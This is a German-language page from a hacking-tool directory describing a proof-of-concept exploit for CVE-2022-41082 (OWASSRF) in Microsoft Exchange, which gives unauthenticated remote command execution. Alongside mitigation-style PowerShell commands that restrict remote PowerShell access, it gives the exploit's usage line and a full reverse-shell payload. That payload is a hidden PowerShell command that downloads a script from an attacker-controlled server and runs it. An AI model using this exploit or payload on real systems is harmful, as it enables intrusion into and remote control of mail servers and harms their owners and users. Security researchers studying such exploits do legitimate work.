Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-41082 — CVE-2022-41082-poc | Kitploit
Tools/GitHubGitHub/soltanali0/cve-2022-41082
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubsoltanali0/cve-2022-41082

CVE-2022-41082

CVE-2022-41082-poc

Repository anzeigen
31vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-41082

Dieses Repository enthält ein Proof-of-Concept-Tool (PoC) zur Ausnutzung der OWASSRF-Sicherheitslücke (CVE-2022-41082) in Microsoft Exchange-Servern. Der Exploit ermöglicht es Angreifern, beliebige Befehle auf dem Server auszuführen und das System möglicherweise zu kompromittieren.

Übersicht

Das Tool nutzt eine OWASSRF-Sicherheitslücke, um die Authentifizierung zu umgehen und Remote-Codeausführung (RCE) auf einem Exchange-Server zu erlangen. Durch die Ausnutzung dieser Sicherheitslücke kann ein Angreifer Befehle ausführen, als wäre er ein authentifizierter Benutzer, was schwerwiegende Sicherheitsauswirkungen hat.

Funktionsweise

  1. Authentifizierungsumgehung: Das Tool verbindet sich mit dem Ziel-Exchange-Server und umgeht die Authentifizierungsmechanismen mithilfe manipulierter Anfragen.
  2. Remote-Codeausführung: Nach erfolgreicher Anmeldung öffnet das Tool eine Sitzung, die die Ausführung von Befehlen auf dem Exchange-Server ermöglicht.
  3. Befehle ausführen: Benutzer können Befehle angeben, die auf dem Server ausgeführt werden sollen, was verschiedene Aktionen ermöglicht, einschließlich Dateimanipulation, Netzwerkoperationen oder das Einrichten von Reverse Shells.

Wichtiger Hinweis

Stellen Sie bei der Verwendung dieses Tools bitte sicher, dass Sie dieselbe Sitzung der Exchange-Verwaltungsshell geöffnet lassen. Es ist entscheidend, den Remote-PowerShell-Zugriff für mindestens einen Benutzer zu aktivieren, nachdem Sie ihn für andere deaktiviert haben. Andernfalls verlieren Sie möglicherweise den Zugriff auf die Verwaltungsshell auf allen Exchange-Servern.

Befehle zur Verwaltung des PowerShell-Zugriffs

Tool herunterladen

Hier sind einige nützliche PowerShell-Befehle, um zu überprüfen und zu verwalten, wer Zugriff hat:

PowerShell-Zugriff überprüfen

Um zu sehen, welche Benutzer Remote-PowerShell-Zugriff haben und welche nicht, führen Sie Folgendes aus:

root@kitploit:~
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'

PowerShell-Zugriff für alle Benutzer deaktivieren

Warnung: Achten Sie darauf, das Fenster der Exchange-Verwaltungsshell nicht zu schließen, es sei denn, Sie fügen mindestens einen Benutzer wieder hinzu.

Sie können den PowerShell-Zugriff für alle Benutzer mit den folgenden Befehlen deaktivieren:

root@kitploit:~
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}

Oder verwenden Sie einen einzelnen Befehl, um dasselbe Ergebnis zu erzielen:

root@kitploit:~
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false

Zugriff für einen bestimmten Benutzer wieder aktivieren

Um einem bestimmten Benutzer Remote-PowerShell-Zugriff zu gewähren, führen Sie Folgendes aus:

root@kitploit:~
Set-User "guest" -RemotePowerShellEnabled $true

Problemumgehung bei Verlust des PowerShell-Zugriffs

Wenn Sie den PowerShell-Zugriff für alle Benutzer verlieren, können Sie einen neuen Postfachbenutzer mit Administratorrechten erstellen. Dieser neue Benutzer umgeht die angewendeten Richtlinien und ermöglicht es Ihnen, die Exchange-Verwaltungsshell erneut zu verwenden.

Verwenden des PoC-Tools

Voraussetzungen

  • Python 3.x
  • Erforderliche Bibliotheken (bei Bedarf über pip installieren)

Ausführen des Tools

Um das PoC-Tool auszuführen, führen Sie den folgenden Befehl aus:

root@kitploit:~
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>

Ersetzen Sie <target_IP>, <username>, <password> und <command_file> durch Ihre jeweiligen Werte.

Beispielbefehl für eine Reverse Shell

Sie können den Befehl in Ihrer cmd_file ändern, um ein Reverse-Shell-Payload einzufügen. Zum Beispiel:

root@kitploit:~
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"

Dieser Befehl lädt ein PowerShell-Skript von Ihrem Server herunter und führt es aus, wodurch Sie eine Reverse Shell erhalten.

Referenzen

Weitere Informationen zur OWASSRF-Sicherheitslücke und zum PoC-Code finden Sie unter dem folgenden Link: OWASSRF CVE-2022-41082 PoC und https://www.youtube.com/watch?v=c2DZYP6jc7g